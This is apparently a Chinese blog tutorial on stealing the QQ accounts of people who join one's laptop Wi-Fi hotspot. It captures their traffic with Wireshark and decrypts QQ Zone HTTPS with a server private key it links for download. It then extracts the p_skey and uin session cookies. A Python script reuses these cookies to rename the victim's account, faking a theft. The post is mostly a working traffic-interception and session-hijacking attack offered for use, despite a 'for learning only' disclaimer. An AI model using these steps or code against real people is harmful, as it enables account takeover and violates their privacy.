盗取连接你wifi的人的qq
#本文内容仅供个人娱乐学习
思路:
使用wireshark监听笔记本的wifi热点,拦截捕获连接你的wifi热点的人的手机qq网络数据包,从网络数据包中分析取出两个qq空间的两个coookie值,使用cookie值修改掉连接你的wifi的人的qq昵称,从而制造账号被盗的假象。
实现:
所需工具:wireshark数据包分析系统,能启用wifi热点的笔记本,一门可以输出http请求的编程语言。
一、启用wifi热点
二、确定wifi热点的接口名称
三、打开wireshark监听这个网络接口
四、用手机连接这个wifi热点,然后打开手机qq浏览一下动态(qq空间)
五、解密wireshark捕获的数据包
未解密的数据流:
qq空间使用了https协议,wireshark无法自动解密https数据流,我们给wireshark提供一个qq空间的服务器证书私钥就可以解密qq空间的数据流了。
这里我已经拿到了qq空间的私钥,qzone.key下载地址:https://pan.baidu.com/s/1HeF9wLMOTVXA8kqWv6ZurQ
配置方法请见:http://www.cnblogs.com/aucy/p/9082429.html
解密后的数据流:
六、解密后在wireshark输入筛选规则“http.cookie”,找到“p_skey”与对应的“uin”这俩cookie值
七、修改目标qq昵称
数据包配置:
url:https://mobile.qzone.qq.com/profile_mod
cookie:p_uin=<uin值> p_skey=<p_skey值>
data:format=json&nickname=<想要改的昵称>&birthyear=2018&birthmonth=1&birthday=1
我这里使用python发送数据包:
- from urllib import request
- def HTTP_POST(url,data,headers):
- req=request.Request(url,bytes(data,"utf-8"),headers)
- res=request.urlopen(req)
- print(res.read())
- def ModNick(nick,cookies):
- url="https://mobile.qzone.qq.com/profile_mod"
- data="format=json&nickname="+nick+"&birthyear=2018&birthmonth=1&birthday=1"
- headers={
- "cookie":cookies
- }
- HTTP_POST(url,data,headers)
- if __name__ == '__main__':
- ModNick("账号已被盗","p_uin=o2221234077; p_skey=W7IF8j7lBIh3UeRdQq1wKS9ToHAKuJnKsjXgzOQmK5w_;")
盗取连接你wifi的人的qq的更多相关文章
- 如何整治那些敢偷用你Wi-Fi的人
我的邻居正在盗用我的WiFi,唔,对此我可以直接选择加密口令,或者…作为一名极客我也可以耍耍他.那么,我就从划分网络开始吧.我把网络划分成两部分,受信任部分和非受信任部分.受信任部分组成一个子网,而非 ...
- Android 得到当前已连接的wifi的信号强度
1.得到当前已连接的wifi信息 WifiManager wifi_service = (WifiManager)getSystemService(WIFI_SERVICE); WifiInfo wi ...
- 如何快速连接无线Wifi 使用二维码
无线Wifi现在已经很普及了,无论是在家.还是在单位.书店.餐馆.咖啡馆等公共场所,只要手机打开Wifi,选择相应的无线Wifi热点,手工输入密码后,即可通过无线Wifi访问互联网. 如何让用户更方便 ...
- ADB连接手机的两种方式(usb数据线连接和wifi连接)
ADB(Android Debug Bridge)安卓测试桥,它是连接电脑开发端和安卓设备的桥梁,这个安卓设备可以是真实的安卓手机或者平板,也可以是虚拟的安卓模拟器, 这里介绍ADB连接手机的两种 ...
- Qt实现探测当前有没有网络连接(Wi-Fi)——QNetworkConfigurationManager.isOnline()
1.只需要探测当前有没有连上Wi-Fi(不用获取网络状态),可以调用<QNetworkConfigurationManager>类. QNetworkConfigurationManage ...
- iOS获取当前连接的wifi信息
导入框架CaptiveNetwork #import <SystemConfiguration/CaptiveNetwork.h> 获取当前连接的wifi信息 // 只能获取当前的SSID ...
- 树莓派怎么连接无线网wifi?
没有显示器的同学,想要连接无线网,一定非常苦恼,前面教会了大家远程登录图形界面,下面我将教会大家:在没有图形界面的情况下,怎么连接树莓派WiFi.同样还是利用putty远程访问软件登录,但这次不需要登 ...
- Windows8.1查看已连接无线WIFI密码
Windows8.1操作系统下查看已连接无线wifi密码操作步骤如下: 1.右键任务栏中的无线图标,在弹出的菜单中选择"打开网络和共享中心": 2.在网络和共享中心界面中点击&qu ...
- Android获取当前连接的wifi名称
首先AndroidMainfest.xml文件里加入权限: <uses-permission android:name="android.permission.ACCESS_NETWO ...
随机推荐
- JDK8记FullGC时候Metaspace内存不会被垃圾回收
本文链接:https://blog.csdn.net/a15939557197/article/details/90635460背景前段时间有一个这样的需求:第三方调用接口,30分钟内调用120W次: ...
- 机器学习之Xgboost算法
知识点 """ xgboost:是一种提升算法,串行的决策树 过程: 第一棵树:目标值:1000 ,预测值:950 第二颗树:目标值:1000-950=50(残差作为输入 ...
- Linux命令集锦:chown命令
chown命令改变某个文件或目录的所有者和所属的组,该命令可以向某个用户授权,使该用户变成指定文件的所有者或者变成文件所属的组. 使用 chown -R liu /usr/wang //将目录/usr ...
- Scrapy+redis实现分布式爬虫
概述 什么是分布式爬虫 需要搭建一个由n台电脑组成的机群,然后在每一台电脑中执行同一组程序,让其对同一网络资源进行联合且分布的数据爬取. 原生Scrapy无法实现分布式的原因 原生Scrapy中调度器 ...
- windows下安装redis数据库
第一步: 下载windows版本的Redis:https://github.com/MSOpenTech/redis/releases 这里我下载的是msi安装程序版: 安装时会让你指定Redis使用 ...
- Redis(1.13)Redis cluster 分布式集群手动配置
[1]试验环境 结构图如下: (这里试验没有那么多机器,就用3台机器搭建试验) redis1是redis集群的一个节点A,上面运行了两个redis实例,7001 7004 redis2是redis集群 ...
- 点了安装SQL2000后没反应了的处理方法
摘自JerrY的博客 http://blog.sina.com.cn/s/blog_403ef7e80101iy3p.html 点了安装SQL2000后没反应了的处理方法 以前的时候给客户电脑安装SQ ...
- FileSystemResource 找不到文件
环境 Spring 3.2.5.RELEASE 原因 使用 FileSystemResource 加载文件的过程中,发现一个奇怪的现象,路径完全正确,但是找不到文件的情况.可能的原因是文件的路径上有压 ...
- 有关java5以后的线程
创建线程的方式 方式一 继承于Thread类 /** * 多线程的创建,方式一:继承于Thread类 * 1. 创建一个继承于Thread类的子类 * 2. 重写Thread类的run() --> ...
- Luogu P4426 [HNOI/AHOI2018]毒瘤
题目 神仙题. 首先我们可以把题意转化为图的独立集计数.显然这个东西是个NP-Hard的. 然后我们可以注意到\(m\le n+10\),也就是说最多有\(11\)条非树边. 我们现在先考虑一下,树上 ...